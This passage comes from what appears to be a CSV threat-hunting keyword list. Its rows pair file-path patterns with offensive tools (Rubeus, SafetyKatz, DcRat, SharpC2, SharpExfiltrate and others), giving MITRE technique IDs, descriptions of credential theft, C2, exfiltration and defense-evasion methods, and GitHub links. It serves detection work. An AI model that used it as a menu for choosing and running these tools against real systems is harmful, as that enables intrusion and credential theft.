synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\Reaper\Reaper.cpp*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*\Reaper-main\*.sys*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*\REC2-main.zip*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*\Recon.tests.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\RecycledGate.c*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,0,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*\RedPersist.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RedPersist.pdb*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RedPersist.sln*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RedPersist-main\*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*\RemoteCamera.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*\Resources\Disks-NoEncryption.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*\resources\PROCEXP.sys*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,0,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*\ROADtools\*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,0,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*\rpcrt.py,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*\rpt_win.exe,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*\rsocx.exe*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*\Rubeus.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*\Rubeus\*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*\ruler.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*\run\john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.com*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\run\john\*.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\RunasCs.cs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*\RunBOF.exe*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*\RunOF.exe*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*\RunOF\bin\*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*\rusthound.exe*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*\SafetyKatz*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,0,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*\samantha.txt,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*\save_reg.hive*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,0,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*\scanACLsResults.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*\scmuacbypass.cpp*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*\scmuacbypass.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*\SCMUACBypass\*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*\ScreenConnect.Client.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.ClientService.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.ClientSetup.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.WindowsBackstageShell.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.WindowsClient.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScriptSentry.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\ScriptSentry.psd1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\ScriptSentry.psm1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\ScriptSentry.txt*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\Seatbelt.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\Seatbelt\Commands\*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*\ServerC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\ServerC2.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\ServerC2\ServerC2.*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\servers\dns_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\servers\icmp_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\servers\smb_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\SessionSearcher.csproj*,offensive_tool_keyword,SessionSearcher,Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details,T1552.004 - T1083 - T1114.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\SessionSearcher.exe*,offensive_tool_keyword,SessionSearcher,Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details,T1552.004 - T1083 - T1114.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\shadowcoerce.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\ShadowSpray\*.cs*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*\Sharefinder.ps1*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\SharpAzbelt.csproj*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*\SharpAzbelt.exe*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*\SharpAzbelt.sln*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*\SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*\SharpDomainSpraty\*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*\SharpDoor.cs*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*\SharpEfsPotato*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*\SharpExfiltrate\*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*\SharpGmailC2*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*\SharpHoundCommon\*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*\SharpMove.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral 